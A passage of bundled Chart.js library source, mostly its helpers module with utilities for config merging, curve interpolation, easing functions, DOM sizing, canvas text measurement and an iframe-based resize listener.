if (typeof value === 'number' && !isNaN(me._view[key])) {
me._view[key] = value * ease;
} else {
me._view[key] = value;
}
// No unnecessary computations
} else if (value === me._view[key]) {
// It's the same! Woohoo!
// Color transitions if possible
} else if (typeof value === 'string') {
try {
var color = helpers.color(me._model[key]).mix(helpers.color(me._start[key]), ease);
me._view[key] = color.rgbString();
} catch (err) {
me._view[key] = value;
}
// Number transitions
} else if (typeof value === 'number') {
var startVal = me._start[key] !== undefined && isNaN(me._start[key]) === false ? me._start[key] : 0;
me._view[key] = ((me._model[key] - startVal) * ease) + startVal;
// Everything else
} else {
me._view[key] = value;
}
}, me);
return me;
},
tooltipPosition: function () {
return {
x: this._model.x,
y: this._model.y
};
},
hasValue: function () {
return helpers.isNumber(this._model.x) && helpers.isNumber(this._model.y);
}
});
Chart.Element.extend = helpers.inherits;
};
}, {}], 26: [function (require, module, exports) {
/* global window: false */
/* global document: false */
'use strict';
var color = require(3);
module.exports = function (Chart) {
// Global Chart helpers object for utility methods and classes
var helpers = Chart.helpers = {};
// -- Basic js utility methods
helpers.each = function (loopable, callback, self, reverse) {
// Check to see if null or undefined firstly.
var i, len;
if (helpers.isArray(loopable)) {
len = loopable.length;
if (reverse) {
for (i = len - 1; i >= 0; i--) {
callback.call(self, loopable[i], i);
}
} else {
for (i = 0; i < len; i++) {
callback.call(self, loopable[i], i);
}
}
} else if (typeof loopable === 'object') {
var keys = Object.keys(loopable);
len = keys.length;
for (i = 0; i < len; i++) {
callback.call(self, loopable[keys[i]], keys[i]);
}
}
};
helpers.clone = function (obj) {
var objClone = {};
helpers.each(obj, function (value, key) {
if (helpers.isArray(value)) {
objClone[key] = value.slice(0);
} else if (typeof value === 'object' && value !== null) {
objClone[key] = helpers.clone(value);
} else {
objClone[key] = value;
}
});
return objClone;
};
helpers.extend = function (base) {
var setFn = function (value, key) {
base[key] = value;
};
for (var i = 1, ilen = arguments.length; i < ilen; i++) {
helpers.each(arguments[i], setFn);
}
return base;
};
// Need a special merge function to chart configs since they are now grouped
helpers.configMerge = function (_base) {
var base = helpers.clone(_base);
helpers.each(Array.prototype.slice.call(arguments, 1), function (extension) {
helpers.each(extension, function (value, key) {
var baseHasProperty = base.hasOwnProperty(key);
var baseVal = baseHasProperty ? base[key] : {};
if (key === 'scales') {
// Scale config merging is complex. Add our own function here for that
base[key] = helpers.scaleMerge(baseVal, value);
} else if (key === 'scale') {
// Used in polar area & radar charts since there is only one scale
base[key] = helpers.configMerge(baseVal, Chart.scaleService.getScaleDefaults(value.type), value);
} else if (baseHasProperty
&& typeof baseVal === 'object'
&& !helpers.isArray(baseVal)
&& baseVal !== null
&& typeof value === 'object'
&& !helpers.isArray(value)) {
// If we are overwriting an object with an object, do a merge of the properties.
base[key] = helpers.configMerge(baseVal, value);
} else {
// can just overwrite the value in this case
base[key] = value;
}
});
});
return base;
};
helpers.scaleMerge = function (_base, extension) {
var base = helpers.clone(_base);
helpers.each(extension, function (value, key) {
if (key === 'xAxes' || key === 'yAxes') {
// These properties are arrays of items
if (base.hasOwnProperty(key)) {
helpers.each(value, function (valueObj, index) {
var axisType = helpers.getValueOrDefault(valueObj.type, key === 'xAxes' ? 'category' : 'linear');
var axisDefaults = Chart.scaleService.getScaleDefaults(axisType);
if (index >= base[key].length || !base[key][index].type) {
base[key].push(helpers.configMerge(axisDefaults, valueObj));
} else if (valueObj.type && valueObj.type !== base[key][index].type) {
// Type changed. Bring in the new defaults before we bring in valueObj so that valueObj can override the correct scale defaults
base[key][index] = helpers.configMerge(base[key][index], axisDefaults, valueObj);
} else {
// Type is the same
base[key][index] = helpers.configMerge(base[key][index], valueObj);
}
});
} else {
base[key] = [];
helpers.each(value, function (valueObj) {
var axisType = helpers.getValueOrDefault(valueObj.type, key === 'xAxes' ? 'category' : 'linear');
base[key].push(helpers.configMerge(Chart.scaleService.getScaleDefaults(axisType), valueObj));
});
}
} else if (base.hasOwnProperty(key) && typeof base[key] === 'object' && base[key] !== null && typeof value === 'object') {
// If we are overwriting an object with an object, do a merge of the properties.
base[key] = helpers.configMerge(base[key], value);
} else {
// can just overwrite the value in this case
base[key] = value;
}
});
return base;
};
helpers.getValueAtIndexOrDefault = function (value, index, defaultValue) {
if (value === undefined || value === null) {
return defaultValue;
}
if (helpers.isArray(value)) {
return index < value.length ? value[index] : defaultValue;
}
return value;
};
helpers.getValueOrDefault = function (value, defaultValue) {
return value === undefined ? defaultValue : value;
};
helpers.indexOf = Array.prototype.indexOf ?
function (array, item) {
return array.indexOf(item);
} :
function (array, item) {
for (var i = 0, ilen = array.length; i < ilen; ++i) {
if (array[i] === item) {
return i;
}
}
return -1;
};
helpers.where = function (collection, filterCallback) {
if (helpers.isArray(collection) && Array.prototype.filter) {
return collection.filter(filterCallback);
}
var filtered = [];
helpers.each(collection, function (item) {
if (filterCallback(item)) {
filtered.push(item);
}
});
return filtered;
};
helpers.findIndex = Array.prototype.findIndex ?
function (array, callback, scope) {
return array.findIndex(callback, scope);
} :
function (array, callback, scope) {
scope = scope === undefined ? array : scope;
for (var i = 0, ilen = array.length; i < ilen; ++i) {
if (callback.call(scope, array[i], i, array)) {
return i;
}
}
return -1;
};
helpers.findNextWhere = function (arrayToSearch, filterCallback, startIndex) {
// Default to start of the array
if (startIndex === undefined || startIndex === null) {
startIndex = -1;
}
for (var i = startIndex + 1; i < arrayToSearch.length; i++) {
var currentItem = arrayToSearch[i];
if (filterCallback(currentItem)) {
return currentItem;
}
}
};
helpers.findPreviousWhere = function (arrayToSearch, filterCallback, startIndex) {
// Default to end of the array
if (startIndex === undefined || startIndex === null) {
startIndex = arrayToSearch.length;
}
for (var i = startIndex - 1; i >= 0; i--) {
var currentItem = arrayToSearch[i];
if (filterCallback(currentItem)) {
return currentItem;
}
}
};
helpers.inherits = function (extensions) {
// Basic javascript inheritance based on the model created in Backbone.js
var me = this;
var ChartElement = (extensions && extensions.hasOwnProperty('constructor')) ? extensions.constructor : function () {
return me.apply(this, arguments);
};
var Surrogate = function () {
this.constructor = ChartElement;
};
Surrogate.prototype = me.prototype;
ChartElement.prototype = new Surrogate();
ChartElement.extend = helpers.inherits;
if (extensions) {
helpers.extend(ChartElement.prototype, extensions);
}
ChartElement.__super__ = me.prototype;
return ChartElement;
};
helpers.noop = function () {
};
helpers.uid = (function () {
var id = 0;
return function () {
return id++;
};
}());
// -- Math methods
helpers.isNumber = function (n) {
return !isNaN(parseFloat(n)) && isFinite(n);
};
helpers.almostEquals = function (x, y, epsilon) {
return Math.abs(x - y) < epsilon;
};
helpers.max = function (array) {
return array.reduce(function (max, value) {
if (!isNaN(value)) {
return Math.max(max, value);
}
return max;
}, Number.NEGATIVE_INFINITY);
};
helpers.min = function (array) {
return array.reduce(function (min, value) {
if (!isNaN(value)) {
return Math.min(min, value);
}
return min;
}, Number.POSITIVE_INFINITY);
};
helpers.sign = Math.sign ?
function (x) {
return Math.sign(x);
} :
function (x) {
x = +x; // convert to a number
if (x === 0 || isNaN(x)) {
return x;
}
return x > 0 ? 1 : -1;
};
helpers.log10 = Math.log10 ?
function (x) {
return Math.log10(x);
} :
function (x) {
return Math.log(x) / Math.LN10;
};
helpers.toRadians = function (degrees) {
return degrees * (Math.PI / 180);
};
helpers.toDegrees = function (radians) {
return radians * (180 / Math.PI);
};
// Gets the angle from vertical upright to the point about a centre.
helpers.getAngleFromPoint = function (centrePoint, anglePoint) {
var distanceFromXCenter = anglePoint.x - centrePoint.x,
distanceFromYCenter = anglePoint.y - centrePoint.y,
radialDistanceFromCenter = Math.sqrt(distanceFromXCenter * distanceFromXCenter + distanceFromYCenter * distanceFromYCenter);
var angle = Math.atan2(distanceFromYCenter, distanceFromXCenter);
if (angle < (-0.5 * Math.PI)) {
angle += 2.0 * Math.PI; // make sure the returned angle is in the range of (-PI/2, 3PI/2]
}
return {
angle: angle,
distance: radialDistanceFromCenter
};
};
helpers.distanceBetweenPoints = function (pt1, pt2) {
return Math.sqrt(Math.pow(pt2.x - pt1.x, 2) + Math.pow(pt2.y - pt1.y, 2));
};
helpers.aliasPixel = function (pixelWidth) {
return (pixelWidth % 2 === 0) ? 0 : 0.5;
};
helpers.splineCurve = function (firstPoint, middlePoint, afterPoint, t) {
// Props to Rob Spencer at scaled innovation for his post on splining between points
// http://scaledinnovation.com/analytics/splines/aboutSplines.html
// This function must also respect "skipped" points
var previous = firstPoint.skip ? middlePoint : firstPoint,
current = middlePoint,
next = afterPoint.skip ? middlePoint : afterPoint;
var d01 = Math.sqrt(Math.pow(current.x - previous.x, 2) + Math.pow(current.y - previous.y, 2));
var d12 = Math.sqrt(Math.pow(next.x - current.x, 2) + Math.pow(next.y - current.y, 2));
var s01 = d01 / (d01 + d12);
var s12 = d12 / (d01 + d12);
// If all points are the same, s01 & s02 will be inf
s01 = isNaN(s01) ? 0 : s01;
s12 = isNaN(s12) ? 0 : s12;
var fa = t * s01; // scaling factor for triangle Ta
var fb = t * s12;
return {
previous: {
x: current.x - fa * (next.x - previous.x),
y: current.y - fa * (next.y - previous.y)
},
next: {
x: current.x + fb * (next.x - previous.x),
y: current.y + fb * (next.y - previous.y)
}
};
};
helpers.EPSILON = Number.EPSILON || 1e-14;
helpers.splineCurveMonotone = function (points) {
// This function calculates Bézier control points in a similar way than |splineCurve|,
// but preserves monotonicity of the provided data and ensures no local extremums are added
// between the dataset discrete points due to the interpolation.
// See : https://en.wikipedia.org/wiki/Monotone_cubic_interpolation
var pointsWithTangents = (points || []).map(function (point) {
return {
model: point._model,
deltaK: 0,
mK: 0
};
});
// Calculate slopes (deltaK) and initialize tangents (mK)
var pointsLen = pointsWithTangents.length;
var i, pointBefore, pointCurrent, pointAfter;
for (i = 0; i < pointsLen; ++i) {
pointCurrent = pointsWithTangents[i];
if (pointCurrent.model.skip) {
continue;
}
pointBefore = i > 0 ? pointsWithTangents[i - 1] : null;
pointAfter = i < pointsLen - 1 ? pointsWithTangents[i + 1] : null;
if (pointAfter && !pointAfter.model.skip) {
pointCurrent.deltaK = (pointAfter.model.y - pointCurrent.model.y) / (pointAfter.model.x - pointCurrent.model.x);
}
if (!pointBefore || pointBefore.model.skip) {
pointCurrent.mK = pointCurrent.deltaK;
} else if (!pointAfter || pointAfter.model.skip) {
pointCurrent.mK = pointBefore.deltaK;
} else if (this.sign(pointBefore.deltaK) !== this.sign(pointCurrent.deltaK)) {
pointCurrent.mK = 0;
} else {
pointCurrent.mK = (pointBefore.deltaK + pointCurrent.deltaK) / 2;
}
}
// Adjust tangents to ensure monotonic properties
var alphaK, betaK, tauK, squaredMagnitude;
for (i = 0; i < pointsLen - 1; ++i) {
pointCurrent = pointsWithTangents[i];
pointAfter = pointsWithTangents[i + 1];
if (pointCurrent.model.skip || pointAfter.model.skip) {
continue;
}
if (helpers.almostEquals(pointCurrent.deltaK, 0, this.EPSILON)) {
pointCurrent.mK = pointAfter.mK = 0;
continue;
}
alphaK = pointCurrent.mK / pointCurrent.deltaK;
betaK = pointAfter.mK / pointCurrent.deltaK;
squaredMagnitude = Math.pow(alphaK, 2) + Math.pow(betaK, 2);
if (squaredMagnitude <= 9) {
continue;
}
tauK = 3 / Math.sqrt(squaredMagnitude);
pointCurrent.mK = alphaK * tauK * pointCurrent.deltaK;
pointAfter.mK = betaK * tauK * pointCurrent.deltaK;
}
// Compute control points
var deltaX;
for (i = 0; i < pointsLen; ++i) {
pointCurrent = pointsWithTangents[i];
if (pointCurrent.model.skip) {
continue;
}
pointBefore = i > 0 ? pointsWithTangents[i - 1] : null;
pointAfter = i < pointsLen - 1 ? pointsWithTangents[i + 1] : null;
if (pointBefore && !pointBefore.model.skip) {
deltaX = (pointCurrent.model.x - pointBefore.model.x) / 3;
pointCurrent.model.controlPointPreviousX = pointCurrent.model.x - deltaX;
pointCurrent.model.controlPointPreviousY = pointCurrent.model.y - deltaX * pointCurrent.mK;
}
if (pointAfter && !pointAfter.model.skip) {
deltaX = (pointAfter.model.x - pointCurrent.model.x) / 3;
pointCurrent.model.controlPointNextX = pointCurrent.model.x + deltaX;
pointCurrent.model.controlPointNextY = pointCurrent.model.y + deltaX * pointCurrent.mK;
}
}
};
helpers.nextItem = function (collection, index, loop) {
if (loop) {
return index >= collection.length - 1 ? collection[0] : collection[index + 1];
}
return index >= collection.length - 1 ? collection[collection.length - 1] : collection[index + 1];
};
helpers.previousItem = function (collection, index, loop) {
if (loop) {
return index <= 0 ? collection[collection.length - 1] : collection[index - 1];
}
return index <= 0 ? collection[0] : collection[index - 1];
};
// Implementation of the nice number algorithm used in determining where axis labels will go
helpers.niceNum = function (range, round) {
var exponent = Math.floor(helpers.log10(range));
var fraction = range / Math.pow(10, exponent);
var niceFraction;
if (round) {
if (fraction < 1.5) {
niceFraction = 1;
} else if (fraction < 3) {
niceFraction = 2;
} else if (fraction < 7) {
niceFraction = 5;
} else {
niceFraction = 10;
}
} else if (fraction <= 1.0) {
niceFraction = 1;
} else if (fraction <= 2) {
niceFraction = 2;
} else if (fraction <= 5) {
niceFraction = 5;
} else {
niceFraction = 10;
}
return niceFraction * Math.pow(10, exponent);
};
// Easing functions adapted from Robert Penner's easing equations
// http://www.robertpenner.com/easing/
var easingEffects = helpers.easingEffects = {
linear: function (t) {
return t;
},
easeInQuad: function (t) {
return t * t;
},
easeOutQuad: function (t) {
return -1 * t * (t - 2);
},
easeInOutQuad: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t;
}
return -1 / 2 * ((--t) * (t - 2) - 1);
},
easeInCubic: function (t) {
return t * t * t;
},
easeOutCubic: function (t) {
return 1 * ((t = t / 1 - 1) * t * t + 1);
},
easeInOutCubic: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t * t;
}
return 1 / 2 * ((t -= 2) * t * t + 2);
},
easeInQuart: function (t) {
return t * t * t * t;
},
easeOutQuart: function (t) {
return -1 * ((t = t / 1 - 1) * t * t * t - 1);
},
easeInOutQuart: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t * t * t;
}
return -1 / 2 * ((t -= 2) * t * t * t - 2);
},
easeInQuint: function (t) {
return 1 * (t /= 1) * t * t * t * t;
},
easeOutQuint: function (t) {
return 1 * ((t = t / 1 - 1) * t * t * t * t + 1);
},
easeInOutQuint: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t * t * t * t;
}
return 1 / 2 * ((t -= 2) * t * t * t * t + 2);
},
easeInSine: function (t) {
return -1 * Math.cos(t / 1 * (Math.PI / 2)) + 1;
},
easeOutSine: function (t) {
return 1 * Math.sin(t / 1 * (Math.PI / 2));
},
easeInOutSine: function (t) {
return -1 / 2 * (Math.cos(Math.PI * t / 1) - 1);
},
easeInExpo: function (t) {
return (t === 0) ? 1 : 1 * Math.pow(2, 10 * (t / 1 - 1));
},
easeOutExpo: function (t) {
return (t === 1) ? 1 : 1 * (-Math.pow(2, -10 * t / 1) + 1);
},
easeInOutExpo: function (t) {
if (t === 0) {
return 0;
}
if (t === 1) {
return 1;
}
if ((t /= 1 / 2) < 1) {
return 1 / 2 * Math.pow(2, 10 * (t - 1));
}
return 1 / 2 * (-Math.pow(2, -10 * --t) + 2);
},
easeInCirc: function (t) {
if (t >= 1) {
return t;
}
return -1 * (Math.sqrt(1 - (t /= 1) * t) - 1);
},
easeOutCirc: function (t) {
return 1 * Math.sqrt(1 - (t = t / 1 - 1) * t);
},
easeInOutCirc: function (t) {
if ((t /= 1 / 2) < 1) {
return -1 / 2 * (Math.sqrt(1 - t * t) - 1);
}
return 1 / 2 * (Math.sqrt(1 - (t -= 2) * t) + 1);
},
easeInElastic: function (t) {
var s = 1.70158;
var p = 0;
var a = 1;
if (t === 0) {
return 0;
}
if ((t /= 1) === 1) {
return 1;
}
if (!p) {
p = 1 * 0.3;
}
if (a < Math.abs(1)) {
a = 1;
s = p / 4;
} else {
s = p / (2 * Math.PI) * Math.asin(1 / a);
}
return -(a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * 1 - s) * (2 * Math.PI) / p));
},
easeOutElastic: function (t) {
var s = 1.70158;
var p = 0;
var a = 1;
if (t === 0) {
return 0;
}
if ((t /= 1) === 1) {
return 1;
}
if (!p) {
p = 1 * 0.3;
}
if (a < Math.abs(1)) {
a = 1;
s = p / 4;
} else {
s = p / (2 * Math.PI) * Math.asin(1 / a);
}
return a * Math.pow(2, -10 * t) * Math.sin((t * 1 - s) * (2 * Math.PI) / p) + 1;
},
easeInOutElastic: function (t) {
var s = 1.70158;
var p = 0;
var a = 1;
if (t === 0) {
return 0;
}
if ((t /= 1 / 2) === 2) {
return 1;
}
if (!p) {
p = 1 * (0.3 * 1.5);
}
if (a < Math.abs(1)) {
a = 1;
s = p / 4;
} else {
s = p / (2 * Math.PI) * Math.asin(1 / a);
}
if (t < 1) {
return -0.5 * (a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * 1 - s) * (2 * Math.PI) / p));
}
return a * Math.pow(2, -10 * (t -= 1)) * Math.sin((t * 1 - s) * (2 * Math.PI) / p) * 0.5 + 1;
},
easeInBack: function (t) {
var s = 1.70158;
return 1 * (t /= 1) * t * ((s + 1) * t - s);
},
easeOutBack: function (t) {
var s = 1.70158;
return 1 * ((t = t / 1 - 1) * t * ((s + 1) * t + s) + 1);
},
easeInOutBack: function (t) {
var s = 1.70158;
if ((t /= 1 / 2) < 1) {
return 1 / 2 * (t * t * (((s *= (1.525)) + 1) * t - s));
}
return 1 / 2 * ((t -= 2) * t * (((s *= (1.525)) + 1) * t + s) + 2);
},
easeInBounce: function (t) {
return 1 - easingEffects.easeOutBounce(1 - t);
},
easeOutBounce: function (t) {
if ((t /= 1) < (1 / 2.75)) {
return 1 * (7.5625 * t * t);
} else if (t < (2 / 2.75)) {
return 1 * (7.5625 * (t -= (1.5 / 2.75)) * t + 0.75);
} else if (t < (2.5 / 2.75)) {
return 1 * (7.5625 * (t -= (2.25 / 2.75)) * t + 0.9375);
}
return 1 * (7.5625 * (t -= (2.625 / 2.75)) * t + 0.984375);
},
easeInOutBounce: function (t) {
if (t < 1 / 2) {
return easingEffects.easeInBounce(t * 2) * 0.5;
}
return easingEffects.easeOutBounce(t * 2 - 1) * 0.5 + 1 * 0.5;
}
};
// Request animation polyfill - http://www.paulirish.com/2011/requestanimationframe-for-smart-animating/
helpers.requestAnimFrame = (function () {
return window.requestAnimationFrame ||
window.webkitRequestAnimationFrame ||
window.mozRequestAnimationFrame ||
window.oRequestAnimationFrame ||
window.msRequestAnimationFrame ||
function (callback) {
return window.setTimeout(callback, 1000 / 60);
};
}());
helpers.cancelAnimFrame = (function () {
return window.cancelAnimationFrame ||
window.webkitCancelAnimationFrame ||
window.mozCancelAnimationFrame ||
window.oCancelAnimationFrame ||
window.msCancelAnimationFrame ||
function (callback) {
return window.clearTimeout(callback, 1000 / 60);
};
}());
// -- DOM methods
helpers.getRelativePosition = function (evt, chart) {
var mouseX, mouseY;
var e = evt.originalEvent || evt,
canvas = evt.currentTarget || evt.srcElement,
boundingRect = canvas.getBoundingClientRect();
var touches = e.touches;
if (touches && touches.length > 0) {
mouseX = touches[0].clientX;
mouseY = touches[0].clientY;
} else {
mouseX = e.clientX;
mouseY = e.clientY;
}
// Scale mouse coordinates into canvas coordinates
// by following the pattern laid out by 'jerryj' in the comments of
// http://www.html5canvastutorials.com/advanced/html5-canvas-mouse-coordinates/
var paddingLeft = parseFloat(helpers.getStyle(canvas, 'padding-left'));
var paddingTop = parseFloat(helpers.getStyle(canvas, 'padding-top'));
var paddingRight = parseFloat(helpers.getStyle(canvas, 'padding-right'));
var paddingBottom = parseFloat(helpers.getStyle(canvas, 'padding-bottom'));
var width = boundingRect.right - boundingRect.left - paddingLeft - paddingRight;
var height = boundingRect.bottom - boundingRect.top - paddingTop - paddingBottom;
// We divide by the current device pixel ratio, because the canvas is scaled up by that amount in each direction. However
// the backend model is in unscaled coordinates. Since we are going to deal with our model coordinates, we go back here
mouseX = Math.round((mouseX - boundingRect.left - paddingLeft) / (width) * canvas.width / chart.currentDevicePixelRatio);
mouseY = Math.round((mouseY - boundingRect.top - paddingTop) / (height) * canvas.height / chart.currentDevicePixelRatio);
return {
x: mouseX,
y: mouseY
};
};
helpers.addEvent = function (node, eventType, method) {
if (node.addEventListener) {
node.addEventListener(eventType, method);
} else if (node.attachEvent) {
node.attachEvent('on' + eventType, method);
} else {
node['on' + eventType] = method;
}
};
helpers.removeEvent = function (node, eventType, handler) {
if (node.removeEventListener) {
node.removeEventListener(eventType, handler, false);
} else if (node.detachEvent) {
node.detachEvent('on' + eventType, handler);
} else {
node['on' + eventType] = helpers.noop;
}
};
helpers.bindEvents = function (chartInstance, arrayOfEvents, handler) {
// Create the events object if it's not already present
var events = chartInstance.events = chartInstance.events || {};
helpers.each(arrayOfEvents, function (eventName) {
events[eventName] = function () {
handler.apply(chartInstance, arguments);
};
helpers.addEvent(chartInstance.chart.canvas, eventName, events[eventName]);
});
};
helpers.unbindEvents = function (chartInstance, arrayOfEvents) {
var canvas = chartInstance.chart.canvas;
helpers.each(arrayOfEvents, function (handler, eventName) {
helpers.removeEvent(canvas, eventName, handler);
});
};
// Private helper function to convert max-width/max-height values that may be percentages into a number
function parseMaxStyle(styleValue, node, parentProperty) {
var valueInPixels;
if (typeof(styleValue) === 'string') {
valueInPixels = parseInt(styleValue, 10);
if (styleValue.indexOf('%') !== -1) {
// percentage * size in dimension
valueInPixels = valueInPixels / 100 * node.parentNode[parentProperty];
}
} else {
valueInPixels = styleValue;
}
return valueInPixels;
}
/**
* Returns if the given value contains an effective constraint.
* @private
*/
function isConstrainedValue(value) {
return value !== undefined && value !== null && value !== 'none';
}
// Private helper to get a constraint dimension
// @param domNode : the node to check the constraint on
// @param maxStyle : the style that defines the maximum for the direction we are using (maxWidth / maxHeight)
// @param percentageProperty : property of parent to use when calculating width as a percentage
// @see http://www.nathanaeljones.com/blog/2013/reading-max-width-cross-browser
function getConstraintDimension(domNode, maxStyle, percentageProperty) {
var view = document.defaultView;
var parentNode = domNode.parentNode;
var constrainedNode = view.getComputedStyle(domNode)[maxStyle];
var constrainedContainer = view.getComputedStyle(parentNode)[maxStyle];
var hasCNode = isConstrainedValue(constrainedNode);
var hasCContainer = isConstrainedValue(constrainedContainer);
var infinity = Number.POSITIVE_INFINITY;
if (hasCNode || hasCContainer) {
return Math.min(
hasCNode ? parseMaxStyle(constrainedNode, domNode, percentageProperty) : infinity,
hasCContainer ? parseMaxStyle(constrainedContainer, parentNode, percentageProperty) : infinity);
}
return 'none';
}
// returns Number or undefined if no constraint
helpers.getConstraintWidth = function (domNode) {
return getConstraintDimension(domNode, 'max-width', 'clientWidth');
};
// returns Number or undefined if no constraint
helpers.getConstraintHeight = function (domNode) {
return getConstraintDimension(domNode, 'max-height', 'clientHeight');
};
helpers.getMaximumWidth = function (domNode) {
var container = domNode.parentNode;
var paddingLeft = parseInt(helpers.getStyle(container, 'padding-left'), 10);
var paddingRight = parseInt(helpers.getStyle(container, 'padding-right'), 10);
var w = container.clientWidth - paddingLeft - paddingRight;
var cw = helpers.getConstraintWidth(domNode);
return isNaN(cw) ? w : Math.min(w, cw);
};
helpers.getMaximumHeight = function (domNode) {
var container = domNode.parentNode;
var paddingTop = parseInt(helpers.getStyle(container, 'padding-top'), 10);
var paddingBottom = parseInt(helpers.getStyle(container, 'padding-bottom'), 10);
var h = container.clientHeight - paddingTop - paddingBottom;
var ch = helpers.getConstraintHeight(domNode);
return isNaN(ch) ? h : Math.min(h, ch);
};
helpers.getStyle = function (el, property) {
return el.currentStyle ?
el.currentStyle[property] :
document.defaultView.getComputedStyle(el, null).getPropertyValue(property);
};
helpers.retinaScale = function (chart) {
var pixelRatio = chart.currentDevicePixelRatio = window.devicePixelRatio || 1;
if (pixelRatio === 1) {
return;
}
var canvas = chart.canvas;
var height = chart.height;
var width = chart.width;
canvas.height = height * pixelRatio;
canvas.width = width * pixelRatio;
chart.ctx.scale(pixelRatio, pixelRatio);
// If no style has been set on the canvas, the render size is used as display size,
// making the chart visually bigger, so let's enforce it to the "correct" values.
// See https://github.com/chartjs/Chart.js/issues/3575
canvas.style.height = height + 'px';
canvas.style.width = width + 'px';
};
// -- Canvas methods
helpers.clear = function (chart) {
chart.ctx.clearRect(0, 0, chart.width, chart.height);
};
helpers.fontString = function (pixelSize, fontStyle, fontFamily) {
return fontStyle + ' ' + pixelSize + 'px ' + fontFamily;
};
helpers.longestText = function (ctx, font, arrayOfThings, cache) {
cache = cache || {};
var data = cache.data = cache.data || {};
var gc = cache.garbageCollect = cache.garbageCollect || [];
if (cache.font !== font) {
data = cache.data = {};
gc = cache.garbageCollect = [];
cache.font = font;
}
ctx.font = font;
var longest = 0;
helpers.each(arrayOfThings, function (thing) {
// Undefined strings and arrays should not be measured
if (thing !== undefined && thing !== null && helpers.isArray(thing) !== true) {
longest = helpers.measureText(ctx, data, gc, longest, thing);
} else if (helpers.isArray(thing)) {
// if it is an array lets measure each element
// to do maybe simplify this function a bit so we can do this more recursively?
helpers.each(thing, function (nestedThing) {
// Undefined strings and arrays should not be measured
if (nestedThing !== undefined && nestedThing !== null && !helpers.isArray(nestedThing)) {
longest = helpers.measureText(ctx, data, gc, longest, nestedThing);
}
});
}
});
var gcLen = gc.length / 2;
if (gcLen > arrayOfThings.length) {
for (var i = 0; i < gcLen; i++) {
delete data[gc[i]];
}
gc.splice(0, gcLen);
}
return longest;
};
helpers.measureText = function (ctx, data, gc, longest, string) {
var textWidth = data[string];
if (!textWidth) {
textWidth = data[string] = ctx.measureText(string).width;
gc.push(string);
}
if (textWidth > longest) {
longest = textWidth;
}
return longest;
};
helpers.numberOfLabelLines = function (arrayOfThings) {
var numberOfLines = 1;
helpers.each(arrayOfThings, function (thing) {
if (helpers.isArray(thing)) {
if (thing.length > numberOfLines) {
numberOfLines = thing.length;
}
}
});
return numberOfLines;
};
helpers.drawRoundedRectangle = function (ctx, x, y, width, height, radius) {
ctx.beginPath();
ctx.moveTo(x + radius, y);
ctx.lineTo(x + width - radius, y);
ctx.quadraticCurveTo(x + width, y, x + width, y + radius);
ctx.lineTo(x + width, y + height - radius);
ctx.quadraticCurveTo(x + width, y + height, x + width - radius, y + height);
ctx.lineTo(x + radius, y + height);
ctx.quadraticCurveTo(x, y + height, x, y + height - radius);
ctx.lineTo(x, y + radius);
ctx.quadraticCurveTo(x, y, x + radius, y);
ctx.closePath();
};
helpers.color = function (c) {
if (!color) {
console.error('Color.js not found!');
return c;
}
/* global CanvasGradient */
if (c instanceof CanvasGradient) {
return color(Chart.defaults.global.defaultColor);
}
return color(c);
};
helpers.addResizeListener = function (node, callback) {
var iframe = document.createElement('iframe');
iframe.className = 'chartjs-hidden-iframe';
iframe.style.cssText =
'display:block;' +
'overflow:hidden;' +
'border:0;' +
'margin:0;' +
'top:0;' +
'left:0;' +
'bottom:0;' +
'right:0;' +
'height:100%;' +
'width:100%;' +
'position:absolute;' +
'pointer-events:none;' +
'z-index:-1;';
// Prevent the iframe to gain focus on tab.
// https://github.com/chartjs/Chart.js/issues/3090
iframe.tabIndex = -1;
// Let's keep track of this added iframe and thus avoid DOM query when removing it.
var stub = node._chartjs = {
resizer: iframe,
ticking: false
};
// Throttle the callback notification until the next animation frame.
var notify = function () {
if (!stub.ticking) {
stub.ticking = true;
helpers.requestAnimFrame.call(window, function () {
if (stub.resizer) {
stub.ticking = false;
return callback();
}
});
}
};
// If the iframe is re-attached to the DOM, the resize listener is removed because the
// content is reloaded, so make sure to install the handler after the iframe is loaded.
// https://github.com/chartjs/Chart.js/issues/3521
helpers.addEvent(iframe, 'load', function () {
helpers.addEvent(iframe.contentWindow || iframe, 'resize', notify);
// The iframe size might have changed while loading, which can also
// happen if the size has been changed while detached from the DOM.
notify();
});
node.insertBefore(iframe, node.firstChild);
};
helpers.removeResizeListener = function (node) {
if (!node || !node._chartjs) {
return;
}
var iframe = node._chartjs.resizer;
if (iframe) {
iframe.parentNode.removeChild(iframe);
node._chartjs.resizer = null;
}
delete node._chartjs;
};
helpers.isArray = Array.isArray ?
function (obj) {
return Array.isArray(obj);
} :
function (obj) {
return Object.prototype.toString.call(obj) === '[object Array]';
};
// ! @see http://stackoverflow.com/a/14853974
helpers.arrayEquals = function (a0, a1) {
var i, ilen, v0, v1;
if (!a0 || !a1 || a0.length !== a1.length) {
return false;
}
for (i = 0, ilen = a0.length; i < ilen; ++i) {
v0 = a0[i];
v1 = a1[i];
if (v0 instanceof Array && v1 instanceof Array) {
if (!helpers.arrayEquals(v0, v1)) {
return false;
}
} else if (v0 !== v1) {
// NOTE: two different object instances will never be equal: {x:20} != {x:20}
return false;
}
}
return true;
};
helpers.callCallback = function (fn, args, _tArg) {
if (fn && typeof fn.call === 'function') {
fn.apply(_tArg, args);
}
};
helpers.getHoverColor = function (colorValue) {
/* global CanvasPattern */
return (colorValue instanceof CanvasPattern) ?
colorValue :
helpers.color(colorValue).saturate(0.5).darken(0.1).rgbString();
};
};
}, {"3": 3}], 27: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
/**
* Helper function to traverse all of the visible elements in the chart
* @param chart {chart} the chart
* @param handler {Function} the callback to execute for each visible item
*/
function parseVisibleItems(chart, handler) {
var datasets = chart.data.datasets;
var meta, i, j, ilen, jlen;
for (i = 0, ilen = datasets.length; i < ilen; ++i) {
if (!chart.isDatasetVisible(i)) {
continue;
}
meta = chart.getDatasetMeta(i);
for (j = 0, jlen = meta.data.length; j < jlen; ++j) {
var element = meta.data[j];
if (!element._view.skip) {
handler(element);
}
}
}
}
/**
* Helper function to get the items that intersect the event position
* @param items {ChartElement[]} elements to filter
* @param position {Point} the point to be nearest to
* @return {ChartElement[]} the nearest items
*/
